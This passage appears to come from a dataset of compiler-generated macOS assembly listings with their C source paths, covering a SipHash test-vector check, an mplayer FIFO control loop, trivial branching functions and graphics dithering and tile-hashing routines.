.asciz "test vector failed for %d bytes\n"
l_.str.1: ; @.str.1
.asciz "test vector ok\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _test_vectors ## -- Begin function test_vectors
.p2align 4, 0x90
_test_vectors: ## @test_vectors
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $128, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -120(%rbp)
movl $0, -116(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $16, -116(%rbp)
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -116(%rbp), %eax
movb %al, %cl
movslq -116(%rbp), %rax
movb %cl, -112(%rbp,%rax)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -116(%rbp), %eax
addl $1, %eax
movl %eax, -116(%rbp)
jmp LBB0_1
LBB0_4:
movl $0, -116(%rbp)
LBB0_5: ## =>This Inner Loop Header: Depth=1
cmpl $64, -116(%rbp)
jge LBB0_10
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movl -116(%rbp), %eax
movb %al, %cl
movslq -116(%rbp), %rax
movb %cl, -80(%rbp,%rax)
leaq -88(%rbp), %rdi
leaq -80(%rbp), %rsi
movslq -116(%rbp), %rdx
leaq -112(%rbp), %rcx
callq _siphash
leaq -88(%rbp), %rax
movslq -116(%rbp), %rdx
leaq _vectors(%rip), %rcx
shlq $3, %rdx
addq %rdx, %rcx
movq (%rcx), %rcx
movq (%rax), %rax
subq %rcx, %rax
setne %al
movzbl %al, %eax
cmpl $0, %eax
je LBB0_8
## %bb.7: ## in Loop: Header=BB0_5 Depth=1
movl -116(%rbp), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movl -120(%rbp), %eax
addl $1, %eax
movl %eax, -120(%rbp)
LBB0_8: ## in Loop: Header=BB0_5 Depth=1
jmp LBB0_9
LBB0_9: ## in Loop: Header=BB0_5 Depth=1
movl -116(%rbp), %eax
addl $1, %eax
movl %eax, -116(%rbp)
jmp LBB0_5
LBB0_10:
movl -120(%rbp), %eax
movl %eax, -124(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_12
## %bb.11:
movl -124(%rbp), %eax ## 4-byte Reload
addq $128, %rsp
popq %rbp
retq
LBB0_12:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
callq _test_vectors
cmpl $0, %eax
jne LBB1_2
## %bb.1:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB1_2:
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__const
.globl _vectors ## @vectors
.p2align 4
_vectors:
.ascii "1\016\016\335G\333or"
.ascii "\375g\334\223\3059\370t"
.ascii "ZO\251\331\t\200l\r"
.ascii "-~\373\327\226fg\205"
.ascii "\267\207q'\340\224'\317"
.ascii "\215\246\231\315dUv\030"
.ascii "\316\343\376XnF\311\313"
.ascii "7\321\001\213\365\000\002\253"
.ascii "b$\223\232y\365\365\223"
.ascii "\260\344\251\013\337\202\000\236"
.ascii "\363\271\335\224\305\273]z"
.ascii "\247\255k\"F/\263\364"
.ascii "\373\345\016\206\274\217\036u"
.ascii "\220=\204\300'V\352\024"
.ascii "\356\362z\216\220\312#\367"
.ascii "\345E\276Ia\312)\241"
.ascii "\333\233\302W\177\314*?"
.ascii "\224G\276,\365\351\232i"
.ascii "\234\323\215\226\360\263\301K"
.ascii "\275ay\247\035\311m\273"
.ascii "\230\356\242\032\362\\\326\276"
.ascii "\307g;.\260\313\362\320"
.ascii "\210>\243\343\225gS\223"
.ascii "\310\316\\\315\214\003\f\250"
.ascii "\224\257I\366\306P\255\270"
.ascii "\352\270\205\212\336\222\341\274"
.ascii "\363\025\273[\2705\330\027"
.ascii "\255\317k\007ca./"
.ascii "\245\311\035\247\254\252M\336"
.ascii "qe\225\207fP\242\246"
.ascii "(\357I\\S\243\207\255"
.ascii "B\303A\330\372\222\3302"
.ascii "\316|\362r/Q'q"
.ascii "\343xY\371F#\363\247"
.ascii "8\022\005\273\032\260\340\022"
.ascii "\256\227\241\017\3244\340\025"
.ascii "\264\243\025\b\276\377M1"
.ascii "\2019b)\360\220y\002"
.ascii "M\f\364\236\345\324\334\312"
.ascii "\\s3jv\330\277\232"
.ascii "\320\247\004Sk\251>\016"
.ascii "\222YX\374\326B\f\255"
.ascii "\251\025\302\233\310\006s\030"
.ascii "\225+y\363\274\n\246\324"
.ascii "\362\035\362\344\035E5\371"
.ascii "\207Wu\031\004\217S\251"
.ascii "\020\245l\365\337\315\232\333"
.ascii "\353u\t\\\315\230l\320"
.ascii "Q\251\313\236\313\243\022\346"
.ascii "\226\257\255\374,\346f\307"
.ascii "r\376R\227ZCd\356"
.ascii "Z\026E\262v\325\222\241"
.ascii "\262t\313\216\277\207\207\n"
.ascii "o\233\264 =\347\263\201"
.ascii "\352\354\262\243\013\"\250\177"
.ascii "\231$\244<\3011W$"
.ascii "\275\203\215:\257\277\215\267"
.ascii "\013\032*2e\325\032\352"
.ascii "\023Py\243#\034\346`"
.ascii "\223+(F\344\327\006f"
.ascii "\341\221_\\\261\354\244l"
.ascii "\363%\226\\\241mb\237"
.ascii "W_\362\216`8\033\345"
.ascii "rE\006\353L2\212\225"
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "test vector failed for %d bytes\n"
L_.str.1: ## @.str.1
.asciz "test vector ok\n"
.subsections_via_symbols
| the_stack_data/1216437.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x1, [x29, #-16]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
mov w1, #2
bl _open
stur w0, [x29, #-20]
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _perror
ldur w0, [x29, #-20]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
LBB0_2:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _system
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _system
b LBB0_3
LBB0_3: ; =>This Inner Loop Header: Depth=1
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
mov x9, sp
add x8, sp, #24
str x8, [x9]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _scanf
ldr w8, [sp, #24]
str w8, [sp, #20] ; 4-byte Folded Spill
subs w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
ldr w8, [sp, #20] ; 4-byte Folded Reload
subs w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_7
LBB0_5: ; in Loop: Header=BB0_3 Depth=1
ldur w0, [x29, #-20]
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
mov x2, #12
bl _write
b LBB0_8
LBB0_6: ; in Loop: Header=BB0_3 Depth=1
ldur w0, [x29, #-20]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
mov x2, #11
bl _write
b LBB0_8
LBB0_7: ; in Loop: Header=BB0_3 Depth=1
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_3 Depth=1
b LBB0_3
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "/tmp/cmd"
l_.str.1: ; @.str.1
.asciz "open cmd error"
l_.str.2: ; @.str.2
.asciz "mkfifo /tmp/cmd"
l_.str.3: ; @.str.3
.asciz "mplayer -quiet -slave -zoom -x 1024 -y 600 -input file=/tmp/cmd -playlist /root/movie/mplayer.list -loop 0 > /dev/null 2>&1 < /dev/null &"
l_.str.4: ; @.str.4
.asciz "\350\257\267\350\276\223\345\205\245\344\275\240\347\232\204\346\223\215\344\275\234:[1] \344\270\212\344\270\200\346\233\262[2] \344\270\213\344\270\200\346\233\262\n"
l_.str.5: ; @.str.5
.asciz "%d"
l_.str.6: ; @.str.6
.asciz "pt_step -1\r\n"
l_.str.7: ; @.str.7
.asciz "pt_step 1\r\n"
l_.str.8: ; @.str.8
.asciz "**error! unknow cmd\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
leaq L_.str(%rip), %rdi
movl $2, %esi
movb $0, %al
callq _open
movl %eax, -20(%rbp)
cmpl $0, -20(%rbp)
jge LBB0_2
## %bb.1:
leaq L_.str.1(%rip), %rdi
callq _perror
movl -20(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
LBB0_2:
leaq L_.str.2(%rip), %rdi
callq _system
leaq L_.str.3(%rip), %rdi
callq _system
LBB0_3: ## =>This Inner Loop Header: Depth=1
leaq L_.str.4(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movb %al, -29(%rbp) ## 1-byte Spill
callq _printf
## kill: def $ecx killed $eax
movb -29(%rbp), %al ## 1-byte Reload
leaq L_.str.5(%rip), %rdi
leaq -24(%rbp), %rsi
callq _scanf
movl -24(%rbp), %eax
movl %eax, -28(%rbp) ## 4-byte Spill
subl $1, %eax
je LBB0_4
jmp LBB0_8
LBB0_8: ## in Loop: Header=BB0_3 Depth=1
movl -28(%rbp), %eax ## 4-byte Reload
subl $2, %eax
je LBB0_5
jmp LBB0_6
LBB0_4: ## in Loop: Header=BB0_3 Depth=1
movl -20(%rbp), %edi
leaq L_.str.6(%rip), %rsi
movl $12, %edx
callq _write
jmp LBB0_7
LBB0_5: ## in Loop: Header=BB0_3 Depth=1
movl -20(%rbp), %edi
leaq L_.str.7(%rip), %rsi
movl $11, %edx
callq _write
jmp LBB0_7
LBB0_6: ## in Loop: Header=BB0_3 Depth=1
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
LBB0_7: ## in Loop: Header=BB0_3 Depth=1
jmp LBB0_3
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "/tmp/cmd"
L_.str.1: ## @.str.1
.asciz "open cmd error"
L_.str.2: ## @.str.2
.asciz "mkfifo /tmp/cmd"
L_.str.3: ## @.str.3
.asciz "mplayer -quiet -slave -zoom -x 1024 -y 600 -input file=/tmp/cmd -playlist /root/movie/mplayer.list -loop 0 > /dev/null 2>&1 < /dev/null &"
L_.str.4: ## @.str.4
.asciz "\350\257\267\350\276\223\345\205\245\344\275\240\347\232\204\346\223\215\344\275\234:[1] \344\270\212\344\270\200\346\233\262[2] \344\270\213\344\270\200\346\233\262\n"
L_.str.5: ## @.str.5
.asciz "%d"
L_.str.6: ## @.str.6
.asciz "pt_step -1\r\n"
L_.str.7: ## @.str.7
.asciz "pt_step 1\r\n"
L_.str.8: ## @.str.8
.asciz "**error! unknow cmd\n"
.subsections_via_symbols
| the_stack_data/200551.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _a ; -- Begin function a
.p2align 2
_a: ; @a
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #8]
ldr w8, [sp, #8]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldr w8, [sp, #8]
str w8, [sp, #12]
b LBB0_2
LBB0_2:
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _abc ; -- Begin function abc
.p2align 2
_abc: ; @abc
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str w0, [sp, #8]
ldr w8, [sp, #8]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
ldr w8, [sp, #8]
stur w8, [x29, #-4]
b LBB1_3
LBB1_2:
mov w0, #4
bl _a
stur w0, [x29, #-4]
b LBB1_3
LBB1_3:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _def ; -- Begin function def
.p2align 2
_def: ; @def
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #8]
ldr w8, [sp, #8]
str w8, [sp, #8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
ldr w8, [sp, #8]
str w8, [sp, #12]
b LBB2_2
LBB2_2:
ldr w0, [sp, #12]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _a ## -- Begin function a
.p2align 4, 0x90
_a: ## @a
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -8(%rbp)
movl -8(%rbp), %eax
cmpl -8(%rbp), %eax
jne LBB0_2
## %bb.1:
movl -8(%rbp), %eax
movl %eax, -4(%rbp)
LBB0_2:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _abc ## -- Begin function abc
.p2align 4, 0x90
_abc: ## @abc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -8(%rbp)
movl -8(%rbp), %eax
cmpl -8(%rbp), %eax
jne LBB1_2
## %bb.1:
movl -8(%rbp), %eax
movl %eax, -4(%rbp)
jmp LBB1_3
LBB1_2:
movl $4, %edi
callq _a
movl %eax, -4(%rbp)
LBB1_3:
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _def ## -- Begin function def
.p2align 4, 0x90
_def: ## @def
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -8(%rbp)
movl -8(%rbp), %eax
movl %eax, -8(%rbp)
cmpl $0, %eax
je LBB2_2
## %bb.1:
movl -8(%rbp), %eax
movl %eax, -4(%rbp)
LBB2_2:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/644659.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _brush ; -- Begin function brush
.p2align 2
_brush: ; @brush
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
strb w0, [sp, #31]
strb w1, [sp, #30]
str w2, [sp, #24]
str x3, [sp, #16]
ldrb w8, [sp, #31]
ldrb w9, [sp, #30]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB0_3
b LBB0_1
LBB0_1:
ldrb w8, [sp, #31]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, lo
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
ldrb w8, [sp, #31]
strb w8, [sp, #14]
b LBB0_8
LBB0_3:
ldrb w8, [sp, #30]
ldrb w9, [sp, #31]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4:
ldrb w8, [sp, #30]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, lo
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
ldrb w8, [sp, #30]
strb w8, [sp, #14]
b LBB0_7
LBB0_6:
ldr w8, [sp, #24]
strb w8, [sp, #14]
b LBB0_7
LBB0_7:
b LBB0_8
LBB0_8:
ldrb w8, [sp, #14]
subs w8, w8, #127
cset w8, le
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9:
ldrb w8, [sp, #14]
asr w8, w8, #3
and w8, w8, #0xf
adrp x9, _bdithmask@PAGE
add x9, x9, _bdithmask@PAGEOFF
ldr w8, [x9, w8, sxtw #2]
ldr x10, [sp, #16]
str w8, [x10, #12]
ldrb w8, [sp, #31]
lsl w10, w8, #4
ldrb w11, [sp, #14]
mov w8, #8
add w11, w11, #8
sdiv w10, w10, w11
ldr w10, [x9, w10, sxtw #2]
ldr x11, [sp, #16]
str w10, [x11, #8]
ldrb w10, [sp, #30]
lsl w10, w10, #4
ldrb w11, [sp, #14]
add w11, w11, #8
sdiv w10, w10, w11
ldr w10, [x9, w10, sxtw #2]
ldr x11, [sp, #16]
str w10, [x11, #4]
ldr w10, [sp, #24]
lsl w10, w10, #4
ldrb w11, [sp, #14]
add w11, w11, #8
udiv w10, w10, w11
ldr w9, [x9, w10, uxtw #2]
ldr x10, [sp, #16]
str w9, [x10]
ldrb w9, [sp, #31]
and w9, w9, #0x80
orr w8, w8, w9, asr #5
ldrb w9, [sp, #30]
and w9, w9, #0x80
orr w8, w8, w9, asr #6
ldr w9, [sp, #24]
and w9, w9, #0x80
orr w8, w8, w9, lsr #7
strb w8, [sp, #15]
b LBB0_17
LBB0_10:
ldrb w8, [sp, #14]
ldrb w9, [sp, #31]
subs w8, w8, w9
ldrb w9, [sp, #14]
ldrb w10, [sp, #30]
subs w9, w9, w10
add w8, w8, w9
ldrb w9, [sp, #14]
ldr w10, [sp, #24]
subs w9, w9, w10
add w8, w8, w9
subs w8, w8, #8
cset w8, hs
tbnz w8, #0, LBB0_15
b LBB0_11
LBB0_11:
ldrb w8, [sp, #14]
subs w8, w8, #63
cset w8, le
tbnz w8, #0, LBB0_13
b LBB0_12
LBB0_12:
ldrb w8, [sp, #14]
subs w8, w8, #64
asr w9, w8, #2
adrp x8, _ddithmask@PAGE
add x8, x8, _ddithmask@PAGEOFF
ldr w9, [x8, w9, sxtw #2]
mvn w9, w9
ldr x10, [sp, #16]
str w9, [x10, #12]
ldrb w9, [sp, #14]
subs w9, w9, #64
asr w9, w9, #2
ldr w8, [x8, w9, sxtw #2]
ldr x9, [sp, #16]
str w8, [x9]
ldr x9, [sp, #16]
str w8, [x9, #4]
ldr x9, [sp, #16]
str w8, [x9, #8]
mov w8, #7
strb w8, [sp, #15]
b LBB0_14
LBB0_13:
ldrb w8, [sp, #14]
asr w9, w8, #2
adrp x8, _ddithmask@PAGE
add x8, x8, _ddithmask@PAGEOFF
ldr w8, [x8, w9, sxtw #2]
ldr x9, [sp, #16]
str w8, [x9, #12]
ldr x8, [sp, #16]
mov w9, #0
str wzr, [x8, #8]
ldr x8, [sp, #16]
str wzr, [x8, #4]
ldr x8, [sp, #16]
str wzr, [x8]
ldrb w8, [sp, #14]
subs w8, w8, #31
cset w8, gt
and w10, w8, #0x1
mov w8, #8
ands w10, w10, #0x1
csel w8, w8, w9, ne
strb w8, [sp, #15]
b LBB0_14
LBB0_14:
b LBB0_16
LBB0_15:
ldr x8, [sp, #16]
str wzr, [x8, #12]
ldrb w8, [sp, #31]
asr w9, w8, #3
adrp x8, _ddithmask@PAGE
add x8, x8, _ddithmask@PAGEOFF
ldr w9, [x8, w9, sxtw #2]
ldr x10, [sp, #16]
str w9, [x10, #8]
ldrb w9, [sp, #30]
asr w9, w9, #3
ldr w9, [x8, w9, sxtw #2]
ldr x10, [sp, #16]
str w9, [x10, #4]
ldr w9, [sp, #24]
lsr w9, w9, #3
ldr w8, [x8, w9, uxtw #2]
ldr x9, [sp, #16]
str w8, [x9]
ldrb w8, [sp, #31]
and w9, w8, #0x40
ldrb w8, [sp, #30]
and w8, w8, #0x40
asr w8, w8, #5
orr w8, w8, w9, asr #4
ldr w9, [sp, #24]
and w9, w9, #0x40
orr w8, w8, w9, lsr #6
strb w8, [sp, #15]
b LBB0_16
LBB0_16:
b LBB0_17
LBB0_17:
ldrb w0, [sp, #15]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _plot ; -- Begin function plot
.p2align 2
_plot: ; @plot
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
str w1, [sp, #8]
strb w2, [sp, #7]
ldr w8, [sp, #12]
ands w8, w8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
ldrb w8, [sp, #7]
lsl w8, w8, #4
strb w8, [sp, #7]
b LBB1_2
LBB1_2:
ldrb w10, [sp, #7]
adrp x8, _pixmap@GOTPAGE
ldr x8, [x8, _pixmap@GOTPAGEOFF]
ldr x8, [x8]
adrp x9, _mapwidth@GOTPAGE
ldr x9, [x9, _mapwidth@GOTPAGEOFF]
ldr w9, [x9]
ldr w11, [sp, #8]
mul w9, w9, w11
ldr w11, [sp, #12]
add w9, w9, w11
mov w11, #2
sdiv w9, w9, w11
add x9, x8, w9, sxtw
ldrb w8, [x9]
orr w8, w8, w10
strb w8, [x9]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _plotrgb ; -- Begin function plotrgb
.p2align 2
_plotrgb: ; @plotrgb
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str w0, [sp, #20]
str w1, [sp, #16]
strb w2, [sp, #15]
strb w3, [sp, #14]
strb w4, [sp, #13]
ldrb w0, [sp, #15]
ldrb w1, [sp, #14]
ldrb w2, [sp, #13]
add x3, sp, #24
bl _brush
ldr w8, [sp, #16]
and w9, w8, #0x3
mov w8, #4
mul w8, w8, w9
ldr w9, [sp, #20]
and w9, w9, #0x3
add w8, w8, w9
strb w8, [sp, #12]
ldr w8, [sp, #36]
ldrb w9, [sp, #12]
lsr w8, w8, w9
and w8, w8, #0x1
lsl w8, w8, #3
strb w8, [sp, #11]
ldr w8, [sp, #32]
ldrb w9, [sp, #12]
lsr w8, w8, w9
and w9, w8, #0x1
ldrb w8, [sp, #11]
orr w8, w8, w9, lsl #2
strb w8, [sp, #11]
ldr w8, [sp, #28]
ldrb w9, [sp, #12]
lsr w8, w8, w9
and w9, w8, #0x1
ldrb w8, [sp, #11]
orr w8, w8, w9, lsl #1
strb w8, [sp, #11]
ldr w8, [sp, #24]
ldrb w9, [sp, #12]
lsr w8, w8, w9
and w9, w8, #0x1
ldrb w8, [sp, #11]
orr w8, w8, w9
strb w8, [sp, #11]
ldr w8, [sp, #20]
ands w8, w8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
ldrb w8, [sp, #11]
lsl w8, w8, #4
strb w8, [sp, #11]
b LBB2_2
LBB2_2:
ldrb w10, [sp, #11]
adrp x8, _pixmap@GOTPAGE
ldr x8, [x8, _pixmap@GOTPAGEOFF]
ldr x8, [x8]
adrp x9, _mapwidth@GOTPAGE
ldr x9, [x9, _mapwidth@GOTPAGEOFF]
ldr w9, [x9]
ldr w11, [sp, #16]
mul w9, w9, w11
ldr w11, [sp, #20]
add w9, w9, w11
mov w11, #2
sdiv w9, w9, w11
add x9, x8, w9, sxtw
ldrb w8, [x9]
orr w8, w8, w10
strb w8, [x9]
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_4
b LBB2_3
LBB2_3:
bl ___stack_chk_fail
LBB2_4:
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _addtile ; -- Begin function addtile
.p2align 2
_addtile: ; @addtile
.cfi_startproc
; %bb.0:
sub sp, sp, #240
.cfi_def_cfa_offset 240
stp x29, x30, [sp, #224] ; 16-byte Folded Spill
add x29, sp, #224
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _hashlist@GOTPAGE
ldr x8, [x8, _hashlist@GOTPAGEOFF]
str x8, [sp, #24] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str x0, [sp, #64]
str x1, [sp, #56]
strb wzr, [sp, #47]
str wzr, [sp, #40]
b LBB3_1
LBB3_1: ; =>This Loop Header: Depth=1
; Child Loop BB3_3 Depth 2
ldr w8, [sp, #40]
subs w8, w8, #16
cset w8, ge
tbnz w8, #0, LBB3_8
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
str wzr, [sp, #36]
b LBB3_3
LBB3_3: ; Parent Loop BB3_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #36]
subs w8, w8, #8
cset w8, ge
tbnz w8, #0, LBB3_6
b LBB3_4
LBB3_4: ; in Loop: Header=BB3_3 Depth=2
ldr x8, [sp, #56]
ldrsw x9, [sp, #36]
ldrb w9, [x8, x9]
ldrb w8, [sp, #47]
add w8, w8, w9
strb w8, [sp, #47]
ldr x8, [sp, #56]
ldrsw x9, [sp, #36]
add x8, x8, x9
ldrb w8, [x8]
ldr w10, [sp, #40]
ldr w9, [sp, #36]
add w10, w9, w10, lsl #3
add x9, sp, #72
add x9, x9, w10, sxtw
strb w8, [x9]
b LBB3_5
LBB3_5: ; in Loop: Header=BB3_3 Depth=2
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB3_3
LBB3_6: ; in Loop: Header=BB3_1 Depth=1
adrp x8, _mapwidth@GOTPAGE
ldr x8, [x8, _mapwidth@GOTPAGEOFF]
ldr w8, [x8]
mov w9, #2
sdiv w9, w8, w9
ldr x8, [sp, #56]
add x8, x8, w9, sxtw
str x8, [sp, #56]
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #40]
add w8, w8, #1
str w8, [sp, #40]
b LBB3_1
LBB3_8:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldrb w9, [sp, #47]
; kill: def $x9 killed $w9
ldr x8, [x8, x9, lsl #3]
str x8, [sp, #48]
b LBB3_9
LBB3_9: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #48]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_13
b LBB3_10
LBB3_10: ; in Loop: Header=BB3_9 Depth=1
ldr x1, [sp, #48]
add x0, sp, #72
mov x2, #128
bl _memcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB3_12
b LBB3_11
LBB3_11:
b LBB3_13
LBB3_12: ; in Loop: Header=BB3_9 Depth=1
ldr x8, [sp, #48]
ldr x8, [x8, #128]
str x8, [sp, #48]
b LBB3_9
LBB3_13:
ldr x8, [sp, #48]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_15
b LBB3_14
LBB3_14:
ldr x8, [sp, #24] ; 8-byte Folded Reload
adrp x11, _tilecount@PAGE
ldr w9, [x11, _tilecount@PAGEOFF]
add w10, w9, #1
str w10, [x11, _tilecount@PAGEOFF]
str w9, [sp, #32]
add x10, sp, #72
str x10, [sp, #16] ; 8-byte Folded Spill
str w9, [sp, #208]
ldrb w9, [sp, #47]
; kill: def $x9 killed $w9
ldr x8, [x8, x9, lsl #3]
str x8, [sp, #200]
mov x0, #144
str x0, [sp, #8] ; 8-byte Folded Spill
bl _malloc
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x2, [sp, #8] ; 8-byte Folded Reload
ldr x1, [sp, #16] ; 8-byte Folded Reload
ldrb w9, [sp, #47]
; kill: def $x9 killed $w9
str x0, [x8, x9, lsl #3]
ldrb w9, [sp, #47]
; kill: def $x9 killed $w9
ldr x0, [x8, x9, lsl #3]
mov x3, #-1
bl ___memcpy_chk
